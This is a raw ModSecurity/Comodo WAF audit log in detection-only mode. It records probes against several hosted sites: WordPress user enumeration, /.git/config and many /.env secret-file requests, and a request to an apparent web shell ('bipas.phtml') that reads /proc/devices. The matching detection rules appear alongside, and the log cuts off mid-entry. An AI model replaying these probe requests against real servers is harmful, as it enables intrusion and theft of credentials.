googlebot(at)googlebot.com User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br --6f587f3e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=dj2qdb5k69bt1m4bt9mdva1hnu; expires=Fri, 12 Sep 2025 20:22:37 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --6f587f3e-E-- --6f587f3e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE3aDOE4pbluKGlX80KaFAAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE3aDOE4pbluKGlX80KaFAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749932556631855 1238024 (- - -) Stopwatch2: 1749932556631855 1238024; combined=3083, p1=519, p2=2247, p3=138, p4=40, p5=139, sr=100, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f587f3e-Z-- --a23c5a51-A-- [15/Jun/2025:01:55:21.849907 +0530] aE3asHTt-3YVy1VEp1_9fgAAAAE 15.206.100.126 47512 127.0.0.1 7081 --a23c5a51-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.gulachi.com X-Real-IP: 15.206.100.126 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: PHPSESSID=kg1871k5715q1auli3or8ke6ch; _sfs_id=1bff528add5c29338b7d4a2d381ceb261749932718 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --a23c5a51-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Robots-Tag: noindex Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type, X-OptinMonster-ApiKey X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin WPO-Cache-Status: not cached WPO-Cache-Message: This is a REST API request (identified by REST_REQUEST constant) Connection: close Content-Type: application/json; charset=UTF-8 --a23c5a51-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.gulachi.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.gulachi.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.gulachi.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3asHTt-3YVy1VEp1_9fgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749932720270825 1579205 (- - -) Stopwatch2: 1749932720270825 1579205; combined=2302, p1=368, p2=1813, p3=0, p4=0, p5=120, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a23c5a51-Z-- --ea3b6729-A-- [15/Jun/2025:02:10:24.655584 +0530] aE3eN9AcUP5X8o425y3TKwAAAAQ 195.182.25.114 56132 127.0.0.1 7081 --ea3b6729-B-- GET /.git/config HTTP/1.0 Host: best-website-designs.com X-Real-IP: 195.182.25.114 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 Accept-Encoding: gzip --ea3b6729-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --ea3b6729-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "best-website-designs.com"] [uri "/.git/config"] [unique_id "aE3eN9AcUP5X8o425y3TKwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749933623456207 1199465 (- - -) Stopwatch2: 1749933623456207 1199465; combined=2648, p1=456, p2=2077, p3=0, p4=0, p5=115, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ea3b6729-Z-- --eed5b533-A-- [15/Jun/2025:02:13:56.265688 +0530] aE3fDIMswQnJ3NDxjDY9MQAAAAA 3.219.80.71 35498 127.0.0.1 7081 --eed5b533-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc&viewfile=//proc/devices HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.219.80.71 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --eed5b533-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3257 Connection: close Content-Type: text/html; charset=UTF-8 --eed5b533-H-- Message: Warning. Matched phrase "proc/devices" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/devices found within ARGS:viewfile: /proc/devices"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/devices" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/devices found within ARGS:viewfile: /proc/devices"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3fDIMswQnJ3NDxjDY9MQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749933836260810 4930 (- - -) Stopwatch2: 1749933836260810 4930; combined=2351, p1=443, p2=1766, p3=45, p4=29, p5=68, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eed5b533-Z-- --027a333c-A-- [15/Jun/2025:02:20:27.423918 +0530] aE3gkzpSduy_dUF9ffnAsQAAAAU 78.153.140.151 50384 127.0.0.1 7080 --027a333c-B-- GET /.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en] --027a333c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --027a333c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env"] [unique_id "aE3gkzpSduy_dUF9ffnAsQAAAAU"] Stopwatch: 1749934227420910 3051 (- - -) Stopwatch2: 1749934227420910 3051; combined=1826, p1=394, p2=1340, p3=18, p4=25, p5=49, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --027a333c-Z-- --e0aeca76-A-- [15/Jun/2025:02:20:27.751336 +0530] aE3gk9AcUP5X8o425y3UBwAAAAQ 78.153.140.151 50386 127.0.0.1 7080 --e0aeca76-B-- GET /.env.crt HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8) --e0aeca76-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0aeca76-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.crt"] [unique_id "aE3gk9AcUP5X8o425y3UBwAAAAQ"] Stopwatch: 1749934227748525 2864 (- - -) Stopwatch2: 1749934227748525 2864; combined=1701, p1=385, p2=1228, p3=17, p4=23, p5=48, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e0aeca76-Z-- --63601c63-A-- [15/Jun/2025:02:20:28.404356 +0530] aE3glGQ9wf_T5qIsnxeDNwAAAAI 78.153.140.151 50408 127.0.0.1 7080 --63601c63-B-- GET /.env.pem HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8 --63601c63-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --63601c63-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.pem"] [unique_id "aE3glGQ9wf_T5qIsnxeDNwAAAAI"] Stopwatch: 1749934228401509 2889 (- - -) Stopwatch2: 1749934228401509 2889; combined=1686, p1=422, p2=1176, p3=17, p4=23, p5=48, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --63601c63-Z-- --ce274b18-A-- [15/Jun/2025:02:20:28.733688 +0530] aE3glLJKIKEA2aX91NiwnQAAAAY 78.153.140.151 50424 127.0.0.1 7080 --ce274b18-B-- GET /.envfile HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.17 --ce274b18-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce274b18-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.envfile"] [unique_id "aE3glLJKIKEA2aX91NiwnQAAAAY"] Stopwatch: 1749934228731089 2641 (- - -) Stopwatch2: 1749934228731089 2641; combined=1663, p1=368, p2=1206, p3=17, p4=23, p5=49, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ce274b18-Z-- --08cd1662-A-- [15/Jun/2025:02:20:29.062970 +0530] aE3gldAcUP5X8o425y3UCAAAAAQ 78.153.140.151 50428 127.0.0.1 7080 --08cd1662-B-- GET /Tmp/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.11 --08cd1662-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --08cd1662-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/Tmp/.env"] [unique_id "aE3gldAcUP5X8o425y3UCAAAAAQ"] Stopwatch: 1749934229060333 2689 (- - -) Stopwatch2: 1749934229060333 2689; combined=1574, p1=331, p2=1150, p3=20, p4=25, p5=47, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --08cd1662-Z-- --90307728-A-- [15/Jun/2025:02:20:29.392153 +0530] aE3gleXds7bzDL-AINRVtQAAAAM 78.153.140.151 56496 127.0.0.1 7080 --90307728-B-- GET /.env.yml HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux i686; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 --90307728-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --90307728-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.yml"] [unique_id "aE3gleXds7bzDL-AINRVtQAAAAM"] Stopwatch: 1749934229389300 2911 (- - -) Stopwatch2: 1749934229389300 2911; combined=1717, p1=413, p2=1189, p3=17, p4=23, p5=75, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --90307728-Z-- --28e07461-A-- [15/Jun/2025:02:20:29.720823 +0530] aE3gleUDs24sWFCii7A3qQAAAAo 78.153.140.151 56498 127.0.0.1 7080 --28e07461-B-- GET /.env.k8s HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00 --28e07461-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --28e07461-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.k8s"] [unique_id "aE3gleUDs24sWFCii7A3qQAAAAo"] Stopwatch: 1749934229717775 3091 (- - -) Stopwatch2: 1749934229717775 3091; combined=1867, p1=407, p2=1369, p3=19, p4=24, p5=48, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --28e07461-Z-- --02718662-A-- [15/Jun/2025:02:20:30.052090 +0530] aE3glvBViRrxRfhQ2snODAAAAAE 78.153.140.151 56506 127.0.0.1 7080 --02718662-B-- GET /.env.ini HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 --02718662-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --02718662-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.ini"] [unique_id "aE3glvBViRrxRfhQ2snODAAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.env.ini"] [unique_id "aE3glvBViRrxRfhQ2snODAAAAAE"] Stopwatch: 1749934230048566 3591 (- - -) Stopwatch2: 1749934230048566 3591; combined=2176, p1=493, p2=1542, p3=23, p4=27, p5=91, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --02718662-Z-- --5a257067-A-- [15/Jun/2025:02:20:30.375016 +0530] aE3gltlaOcxgn8EdjwOs9gAAAAc 78.153.140.151 56516 127.0.0.1 7080 --5a257067-B-- GET /.env-csr HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 YaBrowser/17.3.0.1785 Yowser/2.5 Safari/537.36 --5a257067-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a257067-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env-csr"] [unique_id "aE3gltlaOcxgn8EdjwOs9gAAAAc"] Stopwatch: 1749934230371943 3117 (- - -) Stopwatch2: 1749934230371943 3117; combined=1887, p1=414, p2=1379, p3=20, p4=25, p5=49, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5a257067-Z-- --1d6fd279-A-- [15/Jun/2025:02:20:30.701082 +0530] aE3gltAcUP5X8o425y3UCQAAAAQ 78.153.140.151 56528 127.0.0.1 7080 --1d6fd279-B-- GET /.env.swo HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 --1d6fd279-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d6fd279-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.swo"] [unique_id "aE3gltAcUP5X8o425y3UCQAAAAQ"] Stopwatch: 1749934230698124 3001 (- - -) Stopwatch2: 1749934230698124 3001; combined=1776, p1=397, p2=1285, p3=18, p4=24, p5=52, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1d6fd279-Z-- --9fcec412-A-- [15/Jun/2025:02:20:31.032421 +0530] aE3gl-Xds7bzDL-AINRVtgAAAAM 78.153.140.151 56534 127.0.0.1 7080 --9fcec412-B-- GET /.env.swn HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Opera/8.51 (X11; U; Linux i686; en-US; rv:1.8) --9fcec412-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fcec412-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.swn"] [unique_id "aE3gl-Xds7bzDL-AINRVtgAAAAM"] Stopwatch: 1749934231029348 3136 (- - -) Stopwatch2: 1749934231029348 3136; combined=1951, p1=377, p2=1483, p3=19, p4=24, p5=48, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9fcec412-Z-- --75eb8b29-A-- [15/Jun/2025:02:20:31.366445 +0530] aE3gl_BViRrxRfhQ2snODQAAAAE 78.153.140.151 56546 127.0.0.1 7080 --75eb8b29-B-- GET /.env-rce HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36 --75eb8b29-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --75eb8b29-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri 